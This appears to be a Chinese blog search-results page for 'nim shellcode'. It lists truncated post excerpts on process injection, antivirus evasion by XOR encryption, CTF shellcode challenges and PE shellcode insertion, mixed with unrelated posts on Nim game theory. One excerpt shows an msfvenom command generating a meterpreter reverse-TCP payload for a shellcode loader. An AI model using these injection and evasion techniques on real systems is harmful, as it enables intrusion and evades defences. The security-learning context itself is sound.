nim shellcode

因近期项目需要弄一款注入型的程序，但多次尝试后发现传统的API都会被安全软件拦截，比如 CreateRemoteThread、SetWindowHookEx、APC、GetThreadContext、SetThreadContext，甚至 NtCreateThreadEx 也是如此，也有试想过用驱动... ......

Shellcode初探[1]: 什么是shellcode? 用chatGPT构造简易shellcode from：https://blog.restkhz.com/post/glance-at-shellcode-1 前言 我可能又要开一个系列文, 希望这次不要太监了.最近正在重新自学一些比较二进制 ......

mrctf2020_shellcode pwntools中shellcode使用与配置 bamuwe@qianenzhao:~$ checksec mrctf2020_shellcode [*] '/home/bamuwe/mrctf2020_shellcode' Arch: amd64-64-li ......

题目本质就是对一个多项式 \(F\) 进行等比数列求和得到 \(G\)（\(F_i\) 表示 \(i\) 在序列 \(A\) 中的出现次数），求 \(G\) 所有下标 \(>0\) 的位置的权值和。 显然，\(M\) 固定就可以直接做了。但 \(M\) 不固定，所以我们只能暴力枚举 \(M\) 并进 ......

实验5：shellcode编写实验 实验内容： shellcode广泛用于许多涉及代码注入的攻击中。编写shellcode是相当有挑战性的。虽然我们可以很容易地从互联网上找到现有的shellcode，但是能够从头开始编写我们自己的shellcode总是令人兴奋的。shellcode中涉及到几种有趣的 ......

re | 通过C语言编写shellcode(vc6) 接上一篇博客：https://www.cnblogs.com/Mz1-rc/p/17923224.html 对上文中代码进行修改，不使用全局字符串，不使用外部函数调用，关闭/GZ编译选项（栈检查）： #include <stdio.h> #inc ......

首先，我们需要了解 \(Nim\) 游戏是什么东西。 \(Nim\) 游戏指：两个人，有 \(n\) 堆数，每堆有 \(a_i\) 个，每次可以且仅可以取一堆中的若干个数，求问先手有没有必胜策略（当然两个人都足够聪明）。 首先，先研究显然的必胜策略。比如，我们要得到 \(0\) 这个数，那么当你取完 ......

原题链接 题解说的很详细，我来讲讲我对为什么要用异或判断的想法 异或为零是先手必败状态的一个属性，我们通过属性来判断类别。 代码 #include<bits/stdc++.h> using namespace std; int main() { int t; cin>>t; while(t--) { ......

原题链接：ARC168B 题意：有 \(n\) 堆石子，每堆有 \(a_{i}\) 个。每人每次可以取走其中一堆中的 \(x(1 \le x \le k)\) 个。求出一个最大的 \(k\) 使得先手必胜。无解输出 \(0\)，\(k\) 可以取无限大输出 \(-1\)。 一个经典 Nim 游戏的结 ......

在计算机安全领域，进程间通信（IPC）一直是一个备受关注的话题。在本文中，我们将探讨如何使用Windows邮件槽（Mailslot）实现ShellCode的跨进程传输。邮件槽提供了一种简单而有效的单向通信机制，使得任何进程都能够成为邮件槽服务器，并通过`UDP`通信向其他进程发送数据。邮件槽是Win... ......

在计算机安全领域，ShellCode是一段用于利用系统漏洞或执行特定任务的机器码。为了增加攻击的难度，研究人员经常探索新的传递`ShellCode`的方式。本文介绍了一种使用共享内存的方法，通过该方法，两个本地进程可以相互传递ShellCode，从而实现一种巧妙的本地传输手段。如果你问我为何在本地了... ......

ShellCode是一种独立于应用程序的机器代码，通常用于实现特定任务，如执行远程命令、注入恶意软件或利用系统漏洞。在网络安全领域，研究Shellcode是理解恶意软件和提高系统安全性的关键一环。本文将深入探讨如何在C语言中提取Shellcode，并通过XOR加密技术增加其混淆程度。最后，我们将演示... ......

继上一篇文章《Nim 概念 Concept 对性能的影响》后，我在想，既然 method 虚方法造成性能的影响很大，那么有没有更快的方法实现，本文就尝试 Nim 语言中更快的方法。 ......

继上一篇文章《C# 泛型编译特性对性能的影响》后，我又研究了 Nim 语言相关的设计，由于 Nim 语言与 C# 语言有些差异，比如Nim 没有接口，也没有直接的 class 关键字，所以某些实现是变通的办法。 ......

查一下保护 拖进ida看主要逻辑 这里的代码逻辑为mmap开辟一段有执行的地址，可以写入shellcode，但这次写入的shellcode有限制 if ( buf > 90 || buf <= 47 || buf > 57 && buf <= 64 ) break;这里的限制shellcode的十六 ......

这篇笔记其实不光是加密的东西，还有学习到的各种免杀的小技巧，关于XOR的部分已经实现了一个小工具，可以看https://www.cnblogs.com/fdxsec/p/17809606.html，这里就不再写了。 ......

先查看程序的保护状态 可以看到，保护全开，拖进ida看主函数的逻辑 可以看到有个mmap函数： mmap() 函数是Unix和类Unix操作系统中的一个系统调用，用于在进程的地址空间中映射文件或者其它对象。这样做的好处是可以让文件直接映射到内存中，从而避免了频繁的文件 I/O 操作，提高了文件的读取 ......

目录1-如何编写shellcode1-1 纯手搓1-1-1 纯汇编1-1-2 内联汇编1-1-3 使用tiny_libc1-2 借助工具1-2-1 pwntools的shellcraft1-2-2 alpha31-2-3 AE641-2-4 shellcode encoder1-2-5 msf生成1 ......

来源 本题来自ctfi-wiki，是基本ROP中shellcode的一道例题 查看保护 程序只开启了位置无关保护 PIE 并且有可写可执行的段 反汇编 发现程序中直接输出了buf的地址，所以PIE就不起作用了 可以看到，后面read函数还调用了buf，很显然就是要利用buf这个段了 然后在汇编代码发 ......

PoC: 全称“Proof of Concept”，中文“概念验证”，常指 段漏洞证明的代码。 Exp: 全称“Exploit”，中文“利用”，指利用系统漏洞进行攻击的动作作。 Payload: 中文“有效载荷”，指成功 exploit 之后，真正在目标系统执行的代码或指令 RCE: RCE(rem ......

题意 给定 \(N\) 个背包，其中第 \(i\) 个背包中有 \(a_i\) 个石子。同时还有 \(N\) 个盘子，初始时盘子中没有石子。 两人轮流执行下列操作： 若存在背包中还有石子，选择一个非空背包和盘子，将背包中的石子放入盘子中，注意这里对盘子没有要求； 若不存在背包中还有石子，选择一个非空 ......

实现的结果如下： 1.python脚本里面xor key随机生成 长度16位 2.加密后的payload和key直接写入到模板里面 3.编译 使用gcc编译 每次输出文件名随机 完成一个自动化过程 用法 python main.py shellcode.bin 其中shellcode.bin是自己的 ......

博弈论专题 Nim游戏 内容： 有 n 堆石子，每堆石子的石子数给出，甲乙两人回合制取石子，每次可以取任意一堆石子的任意多个（可以直接取完，但不能不取），每个人都按照最优策略来取（抽象），问先手必胜或先手必败？ 结论： 设有 n 堆石子，每堆的个数分别为 a1 , a2 , a3 , …… , an ......

1、第一个shellcode加载器 import ctypes # msf生成的shellcode，命令：msfvenom -e x64/xor_dynamic -i 16 -p windows/x64/meterpreter_reverse_tcp lhost=192.168.111.111 lp ......

arm32_shellcode 题目文件 build.sh #!/bin/bash arm-linux-gnueabi-gcc -g -static -Iinclude -o chal chal.c libcapstone.a chal.c #include <stdio.h> #include < ......

PE格式是 Windows下最常用的可执行文件格式,理解PE文件格式不仅可以了解操作系统的加载流程,还可以更好的理解操作系统对进程和内存相关的管理知识,而有些技术必须建立在了解PE文件格式的基础上,如文件加密与解密,病毒分析,外挂技术等，本次的目标是手工修改或增加节区，并给特定可执行程序插入一段`S... ......

在笔者前几篇文章中我们一直在探讨如何利用`Metasploit`这个渗透工具生成`ShellCode`以及如何将ShellCode注入到特定进程内，本章我们将自己实现一个正向`ShellCode`Shell，当进程被注入后，则我们可以通过利用NC等工具连接到被注入进程内，并以对方的权限及身份执行命令... ......

ShellCode 的格式化与注入功能在实战应用中也尤为重要，格式化`Shellcode`是指将其转换为可执行的二进制格式，使其能够在内存中运行。注入`Shellcode`是指将格式化的`Shellcode`注入到另一个进程的内存中，以便在该进程中执行，此类功能也可算作`ShellCode`技术的延... ......

动态解密执行技术可以对抗杀软的磁盘特征查杀。其原理是将程序代码段中的代码进行加密，然后将加密后的代码回写到原始位置。当程序运行时，将动态解密加密代码，并将解密后的代码回写到原始位置，从而实现内存加载。这种技术可以有效地规避杀软的特征码查杀，因为加密后的代码通常不会被标记为恶意代码。 ......

在之前的文章中，我们实现了一个正向的匿名管道`ShellCode`后门，为了保证文章的简洁易懂并没有增加针对调用函数的动态定位功能，此类方法在更换系统后则由于地址变化导致我们的后门无法正常使用，接下来将实现通过PEB获取`GetProcAddrees`函数地址，并根据该函数实现所需其他函数的地址自定... ......